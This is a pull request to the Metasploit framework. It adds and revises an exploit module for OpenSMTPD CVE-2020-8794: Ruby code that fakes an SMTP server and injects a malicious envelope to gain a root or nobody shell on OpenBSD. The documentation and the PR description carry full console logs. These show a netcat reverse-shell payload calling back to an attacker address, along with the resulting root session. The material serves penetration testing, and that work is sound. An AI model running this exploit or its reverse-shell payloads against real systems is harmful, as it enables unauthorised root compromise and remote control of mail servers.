### PR TITLE
Add OpenSMTPD CVE-2020-8794 LPE exploit

### DIFF
--- a/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md
+++ b/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md
@@ -16,7 +16,8 @@ root user.
 ```
 Id  Name
 --  ----
-0   OpenSMTPD >= commit 80c6a60c
+0   OpenSMTPD < 6.6.4 (new grammar)
+1   OpenSMTPD < 6.6.4 (old grammar)
 ```
 
 ## Verification Steps
@@ -56,15 +57,15 @@ msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
 lhost => 172.16.249.1
 msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
 
-[+] mkfifo /tmp/kxhzzn; nc 172.16.249.1 4444 0</tmp/kxhzzn | /bin/sh >/tmp/kxhzzn 2>&1; rm /tmp/kxhzzn
+[+] mkfifo /tmp/aovyv; nc 172.16.249.1 4444 0</tmp/aovyv | /bin/sh >/tmp/aovyv 2>&1; rm /tmp/aovyv
 [!] SESSION may not be compatible with this module.
 [*] Started reverse TCP handler on 172.16.249.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
-[+] OpenSMTPD 6.6.0 is vulnerable to CVE-2020-8794
-[+] The target appears to be vulnerable.
+[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
 [*] Started service listener on 0.0.0.0:25
-[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'fscgwvlxm@[172.16.249.1]' < /dev/null && echo true
-[*] Client 172.16.249.137:20976 connected
+[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'tlzlzenloqtauretns@[172.16.249.1]' < /dev/null && echo true
+[*] Client 172.16.249.137:26887 connected
+[*] Exploiting new OpenSMTPD grammar
 [*] Faking SMTP server and sending exploit
 [*] Sending: 220
 [*] Expecting: /EHLO /
@@ -79,10 +80,10 @@ MAIL FROM:<w
 dispatcher: local_mail
 type: mda
 mda-user: root
-mda-exec: mkfifo /tmp/fmszt; nc 172.16.249.1 4444 0</tmp/fmszt | /bin/sh >/tmp/fmszt 2>&1; rm /tmp/fmszt; exit 0
+mda-exec: mkfifo /tmp/aumhem; nc 172.16.249.1 4444 0</tmp/aumhem | /bin/sh >/tmp/aumhem 2>&1; rm /tmp/aumhem; exit 0
 
-[*] Disconnecting client 172.16.249.137:20976
-[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.137:41966) at 2020-03-03 13:24:28 -0600
+[*] Disconnecting client 172.16.249.137:26887
+[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.137:37728) at 2020-03-03 14:48:18 -0600
 [*] Server stopped.
 
 id

--- a/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md
+++ b/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md
@@ -4,7 +4,7 @@
 
 This module exploits an out-of-bounds read of an attacker-controlled
 string in OpenSMTPD's MTA implementation to execute a command as the
-root user.
+root or nobody user, depending on the kind of grammar OpenSMTPD uses.
 
 ### Setup
 
@@ -16,8 +16,7 @@ root user.
 ```
 Id  Name
 --  ----
-0   OpenSMTPD < 6.6.4 (new grammar)
-1   OpenSMTPD < 6.6.4 (old grammar)
+0   OpenSMTPD < 6.6.4 (automatic grammar selection)
 ```
 
 ## Verification Steps
@@ -51,21 +50,22 @@ Payload options (cmd/unix/reverse_netcat):
    ----   ---------------  --------  -----------
    LHOST                   yes       The listen address (an interface may be specified)
 
-msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session -1
-session => -1
 msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
 lhost => 172.16.249.1
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
+session => 1
 msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
 
-[+] mkfifo /tmp/aovyv; nc 172.16.249.1 4444 0</tmp/aovyv | /bin/sh >/tmp/aovyv 2>&1; rm /tmp/aovyv
+[+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0</tmp/gkhbba | /bin/sh >/tmp/gkhbba 2>&1; rm /tmp/gkhbba
 [!] SESSION may not be compatible with this module.
 [*] Started reverse TCP handler on 172.16.249.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
+[*] OpenSMTPD 6.6.0 is using new grammar
 [+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
 [*] Started service listener on 0.0.0.0:25
-[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'tlzlzenloqtauretns@[172.16.249.1]' < /dev/null && echo true
-[*] Client 172.16.249.137:26887 connected
-[*] Exploiting new OpenSMTPD grammar
+[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
+[*] Client 172.16.249.137:37747 connected
+[*] Exploiting new OpenSMTPD grammar for a root shell
 [*] Faking SMTP server and sending exploit
 [*] Sending: 220
 [*] Expecting: /EHLO /
@@ -80,14 +80,60 @@ MAIL FROM:<w
 dispatcher: local_mail
 type: mda
 mda-user: root
-mda-exec: mkfifo /tmp/aumhem; nc 172.16.249.1 4444 0</tmp/aumhem | /bin/sh >/tmp/aumhem 2>&1; rm /tmp/aumhem; exit 0
+mda-exec: mkfifo /tmp/rettgqm; nc 172.16.249.1 4444 0</tmp/rettgqm | /bin/sh >/tmp/rettgqm 2>&1; rm /tmp/rettgqm; exit 0
 
-[*] Disconnecting client 172.16.249.137:26887
-[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.137:37728) at 2020-03-03 14:48:18 -0600
+[*] Disconnecting client 172.16.249.137:37747
+[*] Command shell session 3 opened (172.16.249.1:4444 -> 172.16.249.137:3005) at 2020-03-03 18:40:54 -0600
 [*] Server stopped.
 
 id
 uid=0(root) gid=0(wheel) groups=0(wheel)
 uname -a
 OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
+^Z
+Background session 3? [y/N]  y
+```
+
+### OpenSMTPD 6.0.4 on OpenBSD 6.3
+
+```
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2
+session => 2
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
+
+[+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0</tmp/hkioy | /bin/sh >/tmp/hkioy 2>&1; rm /tmp/hkioy
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] OpenSMTPD 6.0.4 is using old grammar
+[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794
+[*] Started service listener on 0.0.0.0:25
+[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
+[*] Client 172.16.249.138:10203 connected
+[*] Exploiting old OpenSMTPD grammar for a nobody shell
+[*] Faking SMTP server and sending exploit
+[*] Sending: 220
+[*] Expecting: /EHLO /
+[+] Received: EHLO
+[*] Sending: 250
+[*] Expecting: /MAIL FROM:<[^>]/
+[+] Received: foo.localdomain
+MAIL FROM:<w
+[*] Sending: 553-
+553
+
+type: mda
+mda-method: mda
+mda-usertable: <getpwnam>
+mda-user: nobody
+mda-buffer: mkfifo /tmp/jszy; nc 172.16.249.1 4444 0</tmp/jszy | /bin/sh >/tmp/jszy 2>&1; rm /tmp/jszy; exit 0
+
+[*] Disconnecting client 172.16.249.138:10203
+[*] Command shell session 4 opened (172.16.249.1:4444 -> 172.16.249.138:40377) at 2020-03-03 18:41:06 -0600
+[*] Server stopped.
+
+id
+uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
+uname -a
+OpenBSD foo.localdomain 6.3 GENERIC#100 amd64
 ```

--- a/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md
+++ b/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md
@@ -1,0 +1,89 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an out-of-bounds read of an attacker-controlled
+string in OpenSMTPD's MTA implementation to execute a command as the
+root user.
+
+### Setup
+
+1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso)
+2. Install the system
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   OpenSMTPD >= commit a8e222352f
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**SESSION**
+
+Set this to a valid session ID on an OpenBSD target.
+
+## Scenarios
+
+### OpenSMTPD 6.6.0 on OpenBSD 6.6
+
+```
+msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > show missing
+
+Module options (exploit/unix/local/opensmtpd_oob_read_lpe):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session -1
+session => -1
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
+
+[+] mkfifo /tmp/fspapws; nc 172.16.249.1 4444 0</tmp/fspapws | /bin/sh >/tmp/fspapws 2>&1; rm /tmp/fspapws
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Started service listener on 0.0.0.0:25
+[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'xwtyonkmmzgtxmmsulkidmpmoh@[172.16.249.1]' < /dev/null && echo true
+[*] Client 172.16.249.137:41899 connected
+[*] Faking SMTP server and sending exploit
+[*] Sending: 220
+[*] Expecting: /EHLO /
+[+] Received: EHLO
+[*] Sending: 250
+[*] Expecting: /MAIL FROM:<[^>]/
+[+] Received: foo.localdomain
+MAIL FROM:<w
+[*] Sending: 553-
+553
+
+dispatcher: local_mail
+type: mda
+mda-user: root
+mda-exec: mkfifo /tmp/wcwnvhv; nc 172.16.249.1 4444 0</tmp/wcwnvhv | /bin/sh >/tmp/wcwnvhv 2>&1; rm /tmp/wcwnvhv; exit 0
+
+[*] Disconnecting client 172.16.249.137:41899
+[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.137:20394) at 2020-02-27 03:06:43 -0600
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+uname -a
+OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
+```

--- a/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md
+++ b/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md
@@ -16,7 +16,7 @@ root user.
 ```
 Id  Name
 --  ----
-0   OpenSMTPD >= commit a8e222352f
+0   OpenSMTPD >= commit 80c6a60c
 ```
 
 ## Verification Steps
@@ -56,12 +56,15 @@ msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
 lhost => 172.16.249.1
 msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
 
-[+] mkfifo /tmp/fspapws; nc 172.16.249.1 4444 0</tmp/fspapws | /bin/sh >/tmp/fspapws 2>&1; rm /tmp/fspapws
+[+] mkfifo /tmp/kxhzzn; nc 172.16.249.1 4444 0</tmp/kxhzzn | /bin/sh >/tmp/kxhzzn 2>&1; rm /tmp/kxhzzn
 [!] SESSION may not be compatible with this module.
 [*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] OpenSMTPD 6.6.0 is vulnerable to CVE-2020-8794
+[+] The target appears to be vulnerable.
 [*] Started service listener on 0.0.0.0:25
-[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'xwtyonkmmzgtxmmsulkidmpmoh@[172.16.249.1]' < /dev/null && echo true
-[*] Client 172.16.249.137:41899 connected
+[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'fscgwvlxm@[172.16.249.1]' < /dev/null && echo true
+[*] Client 172.16.249.137:20976 connected
 [*] Faking SMTP server and sending exploit
 [*] Sending: 220
 [*] Expecting: /EHLO /
@@ -76,10 +79,10 @@ MAIL FROM:<w
 dispatcher: local_mail
 type: mda
 mda-user: root
-mda-exec: mkfifo /tmp/wcwnvhv; nc 172.16.249.1 4444 0</tmp/wcwnvhv | /bin/sh >/tmp/wcwnvhv 2>&1; rm /tmp/wcwnvhv; exit 0
+mda-exec: mkfifo /tmp/fmszt; nc 172.16.249.1 4444 0</tmp/fmszt | /bin/sh >/tmp/fmszt 2>&1; rm /tmp/fmszt; exit 0
 
-[*] Disconnecting client 172.16.249.137:41899
-[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.137:20394) at 2020-02-27 03:06:43 -0600
+[*] Disconnecting client 172.16.249.137:20976
+[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.137:41966) at 2020-03-03 13:24:28 -0600
 [*] Server stopped.
 
 id

--- a/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md
+++ b/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md
@@ -20,7 +20,7 @@ SMTP interaction with OpenSMTPD to execute a command as the root user.
 ```
 Id  Name
 --  ----
-0   OpenSMTPD >= commit a8e222352f
+0   OpenSMTPD < 6.6.1
 ```
 
 ## Verification Steps

--- a/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
+++ b/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Local
       'Description'    => %q{
         This module exploits an out-of-bounds read of an attacker-controlled
         string in OpenSMTPD's MTA implementation to execute a command as the
-        root user.
+        root or nobody user, depending on the kind of grammar OpenSMTPD uses.
       },
       'Author'         => [
         'Qualys', # Discovery and PoC
@@ -33,13 +33,12 @@ class MetasploitModule < Msf::Exploit::Local
       'Platform'       => 'unix',
       'Arch'           => ARCH_CMD,
       'Privileged'     => true, # NOTE: Only when exploiting new grammar
-      # https://github.com/openbsd/src/commit/e396a728fd79383b972631720cddc8e987806546
+      # Patched in 6.6.4: https://www.opensmtpd.org/security.html
+      # New grammar introduced in 6.4.0: https://github.com/openbsd/src/commit/e396a728fd79383b972631720cddc8e987806546
       'Targets'        => [
-        ['OpenSMTPD < 6.6.4 (new grammar)',
-          min_version: Gem::Version.new('6.4.0'),
-        ],
-        ['OpenSMTPD < 6.6.4 (old grammar)',
-          max_version: Gem::Version.new('6.0.4')
+        ['OpenSMTPD < 6.6.4 (automatic grammar selection)',
+          patched_version:     Gem::Version.new('6.6.4'),
+          new_grammar_version: Gem::Version.new('6.4.0')
         ]
       ],
       'DefaultTarget'  => 0,
@@ -58,6 +57,9 @@ class MetasploitModule < Msf::Exploit::Local
     register_advanced_options([
       OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
     ])
+
+    # HACK: We need to run check in order to determine a grammar to use
+    options.remove_option('AutoCheck')
   end
 
   def srvhost_addr
@@ -83,21 +85,13 @@ class MetasploitModule < Msf::Exploit::Local
 
     version = Gem::Version.new(version)
 
-    # Patched in 6.6.4: https://www.opensmtpd.org/security.html
-    if version < Gem::Version.new('6.6.4')
-      case target.name
-      when /new grammar/
-        if version < target[:min_version]
-          return CheckCode::Safe(
-            "OpenSMTPD #{version} does not support new grammar"
-          )
-        end
-      when /old grammar/
-        if version > target[:max_version]
-          return CheckCode::Safe(
-            "OpenSMTPD #{version} does not support old grammar"
-          )
-        end
+    if version < target[:patched_version]
+      if version >= target[:new_grammar_version]
+        vprint_status("OpenSMTPD #{version} is using new grammar")
+        @grammar = :new
+      else
+        vprint_status("OpenSMTPD #{version} is using old grammar")
+        @grammar = :old
       end
 
       return CheckCode::Appears(
@@ -126,9 +120,9 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Client #{client.peerhost}:#{client.peerport} connected")
 
     # Brilliant work, Qualys!
-    case target.name
-    when /new grammar/
-      print_status('Exploiting new OpenSMTPD grammar')
+    case @grammar
+    when :new
+      print_status('Exploiting new OpenSMTPD grammar for a root shell')
 
       yeet = <<~EOF
         553-
@@ -139,8 +133,8 @@ class MetasploitModule < Msf::Exploit::Local
         mda-user: root
         mda-exec: #{payload.encoded}; exit 0\x00
       EOF
-    when /old grammar/
-      print_status('Exploiting old OpenSMTPD grammar')
+    when :old
+      print_status('Exploiting old OpenSMTPD grammar for a nobody shell')
 
       yeet = <<~EOF
         553-
@@ -152,6 +146,8 @@ class MetasploitModule < Msf::Exploit::Local
         mda-user: nobody
         mda-buffer: #{payload.encoded}; exit 0\x00
       EOF
+    else
+      fail_with(Failure::BadConfig, 'Could not determine OpenSMTPD grammar')
     end
 
     sploit = {

--- a/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
+++ b/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = AverageRanking
 
   include Msf::Exploit::Remote::TcpServer
+  include Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Expect
 
   def initialize(info = {})
@@ -32,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Local
       'Platform'       => 'unix',
       'Arch'           => ARCH_CMD,
       'Privileged'     => true,
-      'Targets'        => [['OpenSMTPD >= commit a8e222352f', {}]],
+      'Targets'        => [['OpenSMTPD >= commit 80c6a60c', {}]],
       'DefaultTarget'  => 0,
       'DefaultOptions' => {
         'SRVPORT'      => 25,
@@ -59,7 +60,35 @@ class MetasploitModule < Msf::Exploit::Local
     "#{rand_text_alpha_lower(8..42)}@[#{srvhost_addr}]"
   end
 
+  def check
+    smtpd_help = cmd_exec('smtpd -h')
+
+    if smtpd_help.empty?
+      vprint_error('smtpd(8) help could not be displayed')
+      return CheckCode::Unknown
+    end
+
+    version = smtpd_help.scan(/^version: OpenSMTPD ([\d.p]+)$/).flatten.first
+
+    unless version
+      vprint_error('OpenSMTPD version could not be found')
+      return CheckCode::Unknown
+    end
+
+    # Patched in 6.6.4: https://www.opensmtpd.org/security.html
+    if Gem::Version.new(version) < Gem::Version.new('6.6.4')
+      vprint_good("OpenSMTPD #{version} is vulnerable to CVE-2020-8794")
+      return CheckCode::Appears
+    end
+
+    vprint_error("OpenSMTPD #{version} is NOT vulnerable to CVE-2020-8794")
+    CheckCode::Safe
+  end
+
   def exploit
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
     start_service
 
     sendmail = "/usr/sbin/sendmail '#{rcpt_to}' < /dev/null && echo true"

--- a/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
+++ b/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
@@ -1,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+
+  # smtpd(8) may crash on a malformed message
+  Rank = AverageRanking
+
+  include Msf::Exploit::Remote::TcpServer
+  include Msf::Exploit::Expect
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'OpenSMTPD OOB Read Local Privilege Escalation',
+      'Description'    => %q{
+        This module exploits an out-of-bounds read of an attacker-controlled
+        string in OpenSMTPD's MTA implementation to execute a command as the
+        root user.
+      },
+      'Author'         => [
+        'Qualys', # Discovery and PoC
+        'wvu'     # Module
+      ],
+      'References'     => [
+        ['CVE', '2020-8794'],
+        ['URL', 'https://seclists.org/oss-sec/2020/q1/96']
+      ],
+      'DisclosureDate' => '2020-02-24',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => true,
+      'Targets'        => [['OpenSMTPD >= commit a8e222352f', {}]],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'SRVPORT'      => 25,
+        'PAYLOAD'      => 'cmd/unix/reverse_netcat',
+        'WfsDelay'     => 60 # May take a little while for mail to process
+      }
+    ))
+
+    register_advanced_options([
+      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
+    ])
+  end
+
+  def srvhost_addr
+    Rex::Socket.source_address(session.session_host)
+  end
+
+  def rcpt_to
+    "#{rand_text_alpha_lower(8..42)}@[#{srvhost_addr}]"
+  end
+
+  def exploit
+    start_service
+
+    sendmail = "/usr/sbin/sendmail '#{rcpt_to}' < /dev/null && echo true"
+
+    print_status("Executing local sendmail(8) command: #{sendmail}")
+    if cmd_exec(sendmail) != 'true'
+      fail_with(Failure::Unknown, 'Could not send mail. Is OpenSMTPD running?')
+    end
+  end
+
+  def on_client_connect(client)
+    print_status("Client #{client.peerhost}:#{client.peerport} connected")
+
+    # Brilliant work, Qualys!
+    yeet = <<~EOF
+      553-
+      553
+
+      dispatcher: local_mail
+      type: mda
+      mda-user: root
+      mda-exec: #{payload.encoded}; exit 0\x00
+    EOF
+
+    sploit = {
+      '220' => /EHLO /,
+      '250' => /MAIL FROM:<[^>]/,
+      yeet  => nil
+    }
+
+    print_status('Faking SMTP server and sending exploit')
+    sploit.each do |line, pattern|
+      send_expect(
+        line,
+        pattern,
+        sock:    client,
+        newline: "\r\n",
+        timeout: datastore['ExpectTimeout']
+      )
+    end
+  rescue Timeout::Error => e
+    fail_with(Failure::TimeoutExpired, e.message)
+  ensure
+    print_status("Disconnecting client #{client.peerhost}:#{client.peerport}")
+    client.close
+  end
+
+  def on_client_close(client)
+    print_status("Client #{client.peerhost}:#{client.peerport} disconnected")
+  end
+
+end

--- a/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
+++ b/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
@@ -38,6 +38,11 @@ class MetasploitModule < Msf::Exploit::Local
         'SRVPORT'      => 25,
         'PAYLOAD'      => 'cmd/unix/reverse_netcat',
         'WfsDelay'     => 60 # May take a little while for mail to process
+      },
+      'Notes'          => {
+        'Stability'    => [CRASH_SERVICE_DOWN],
+        'Reliability'  => [REPEATABLE_SESSION],
+        'SideEffects'  => [IOC_IN_LOGS]
       }
     ))
 

--- a/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
+++ b/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
@@ -32,8 +32,16 @@ class MetasploitModule < Msf::Exploit::Local
       'License'        => MSF_LICENSE,
       'Platform'       => 'unix',
       'Arch'           => ARCH_CMD,
-      'Privileged'     => true,
-      'Targets'        => [['OpenSMTPD >= commit 80c6a60c', {}]],
+      'Privileged'     => true, # NOTE: Only when exploiting new grammar
+      # https://github.com/openbsd/src/commit/e396a728fd79383b972631720cddc8e987806546
+      'Targets'        => [
+        ['OpenSMTPD < 6.6.4 (new grammar)',
+          min_version: Gem::Version.new('6.4.0'),
+        ],
+        ['OpenSMTPD < 6.6.4 (old grammar)',
+          max_version: Gem::Version.new('6.0.4')
+        ]
+      ],
       'DefaultTarget'  => 0,
       'DefaultOptions' => {
         'SRVPORT'      => 25,
@@ -64,25 +72,40 @@ class MetasploitModule < Msf::Exploit::Local
     smtpd_help = cmd_exec('smtpd -h')
 
     if smtpd_help.empty?
-      vprint_error('smtpd(8) help could not be displayed')
-      return CheckCode::Unknown
+      return CheckCode::Unknown('smtpd(8) help could not be displayed')
     end
 
     version = smtpd_help.scan(/^version: OpenSMTPD ([\d.p]+)$/).flatten.first
 
     unless version
-      vprint_error('OpenSMTPD version could not be found')
-      return CheckCode::Unknown
+      return CheckCode::Unknown('OpenSMTPD version could not be found')
     end
+
+    version = Gem::Version.new(version)
 
     # Patched in 6.6.4: https://www.opensmtpd.org/security.html
-    if Gem::Version.new(version) < Gem::Version.new('6.6.4')
-      vprint_good("OpenSMTPD #{version} is vulnerable to CVE-2020-8794")
-      return CheckCode::Appears
+    if version < Gem::Version.new('6.6.4')
+      case target.name
+      when /new grammar/
+        if version < target[:min_version]
+          return CheckCode::Safe(
+            "OpenSMTPD #{version} does not support new grammar"
+          )
+        end
+      when /old grammar/
+        if version > target[:max_version]
+          return CheckCode::Safe(
+            "OpenSMTPD #{version} does not support old grammar"
+          )
+        end
+      end
+
+      return CheckCode::Appears(
+        "OpenSMTPD #{version} appears vulnerable to CVE-2020-8794"
+      )
     end
 
-    vprint_error("OpenSMTPD #{version} is NOT vulnerable to CVE-2020-8794")
-    CheckCode::Safe
+    CheckCode::Safe("OpenSMTPD #{version} is NOT vulnerable to CVE-2020-8794")
   end
 
   def exploit
@@ -103,15 +126,33 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Client #{client.peerhost}:#{client.peerport} connected")
 
     # Brilliant work, Qualys!
-    yeet = <<~EOF
-      553-
-      553
+    case target.name
+    when /new grammar/
+      print_status('Exploiting new OpenSMTPD grammar')
 
-      dispatcher: local_mail
-      type: mda
-      mda-user: root
-      mda-exec: #{payload.encoded}; exit 0\x00
-    EOF
+      yeet = <<~EOF
+        553-
+        553
+
+        dispatcher: local_mail
+        type: mda
+        mda-user: root
+        mda-exec: #{payload.encoded}; exit 0\x00
+      EOF
+    when /old grammar/
+      print_status('Exploiting old OpenSMTPD grammar')
+
+      yeet = <<~EOF
+        553-
+        553
+
+        type: mda
+        mda-method: mda
+        mda-usertable: <getpwnam>
+        mda-user: nobody
+        mda-buffer: #{payload.encoded}; exit 0\x00
+      EOF
+    end
 
     sploit = {
       '220' => /EHLO /,

--- a/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
+++ b/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
@@ -7,8 +7,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Expect
 
   def initialize(info = {})

--- a/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
+++ b/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_CMD,
       'Privileged'     => true,
       'Targets'        => [
-        ['OpenSMTPD >= commit a8e222352f',
+        ['OpenSMTPD < 6.6.1',
           'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
         ]
       ],

--- a/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
+++ b/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
@@ -7,8 +7,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ManualRanking
 
-  include Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(update_info(info,


### PR DESCRIPTION
### OpenSMTPD 6.6.0 on OpenBSD 6.6

```
msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > show missing

Module options (exploit/unix/local/opensmtpd_oob_read_lpe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0</tmp/gkhbba | /bin/sh >/tmp/gkhbba 2>&1; rm /tmp/gkhbba
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.6.0 is using new grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.137:37747 connected
[*] Exploiting new OpenSMTPD grammar for a root shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:<w
[*] Sending: 553-
553

dispatcher: local_mail
type: mda
mda-user: root
mda-exec: mkfifo /tmp/rettgqm; nc 172.16.249.1 4444 0</tmp/rettgqm | /bin/sh >/tmp/rettgqm 2>&1; rm /tmp/rettgqm; exit 0

[*] Disconnecting client 172.16.249.137:37747
[*] Command shell session 3 opened (172.16.249.1:4444 -> 172.16.249.137:3005) at 2020-03-03 18:40:54 -0600
[*] Server stopped.

id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
^Z
Background session 3? [y/N]  y
```

### OpenSMTPD 6.0.4 on OpenBSD 6.3

```
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2
session => 2
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0</tmp/hkioy | /bin/sh >/tmp/hkioy 2>&1; rm /tmp/hkioy
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.0.4 is using old grammar
